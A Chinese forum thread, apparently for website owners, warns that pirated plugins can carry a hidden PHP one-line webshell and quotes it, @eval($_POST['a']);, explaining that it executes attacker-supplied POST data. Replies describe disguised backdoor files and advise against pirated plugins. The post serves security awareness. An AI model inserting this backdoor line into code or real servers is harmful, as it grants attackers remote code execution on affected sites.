某盗版插件中惊现一句话木马,小到让你根本无法发现
<br /><br /><strong>传送门:</strong>安全小知识:为什么使用盗版插件容易被挂马!<br /><br /><ol><li>@eval($_POST['a']);</ol>如上面所示,就这么短短的几个字符,隐藏在盗版插件正常代码之中,如果不细心的话,根本无法发现。<br />不懂php的人,可能会怀疑,这么短的一个代码,就是木马?<br /><font face="Source Code Pro, DejaVu Sans Mono, Ubuntu Mono, Anonymous Pro, Droid Sans Mono, Menlo, Monaco, Consolas, Inconsolata, Courier, monospace, PingFang SC, Microsoft YaHei, sans-serif"><font color="#383a42"><font style="background-color:rgb(250, 250, 250)">eval就是把普通的字符串当做php代码来执行,像上面这个代码就是执行接收到的POST数据,利用这段代码,黑客就可以向你的服务器执行代码了。</font></font></font><br /><font face="Source Code Pro, DejaVu Sans Mono, Ubuntu Mono, Anonymous Pro, Droid Sans Mono, Menlo, Monaco, Consolas, Inconsolata, Courier, monospace, PingFang SC, Microsoft YaHei, sans-serif"><font size="5"><font color="#ff0000"><font style="background-color:rgb(250, 250, 250)"><strong>抓紧时间卸载盗版插件吧,盗版插件的安全问题已经不能忽视了!</strong></font></font></font></font><br /><br /><br /><strong>传送门:</strong>安全小知识:为什么使用盗版插件容易被挂马!盗版<em>, </em>插件<em>, </em>代码<em>, </em>Mono<em>, </em>安全 <br /><br />前排支持,拒绝盗版<br />如果你只要用了一次盗版插件,一句后门代码,就可以让整个网站作废<br /><br />有些攻击者不是只劫持首页到非法网站上那么简单,有的时候还会用“间谍式”写入更多潜在后门入口文件,而且命名法会伪装成正常文件名称,代码可能还是加密,以免被检测,这样就可以留着以后再进行攻击,即使你这时候把盗版插件删除,也是无济于事,还是一样会被攻击,除非你把所有新植入的后门文件也都删除了,否则针对一般站长而言,想要安全,就不得不重装网站了<br /><br />如果等发生以上情况再付费找人清理后门文件和维护,不但服务费成本高,也可能没法根除到底,对于如果用心经营网站的站长,千万不要选择盗版插件,也不要随意授权网站关键信息资源给第三方,如服务器,FTP等,做好及时性备份,拒绝使用盗版插件或模版<br /> 坚决不用盗版 <br />说的对,支持 正版 哦哦明白了
頁:
[1]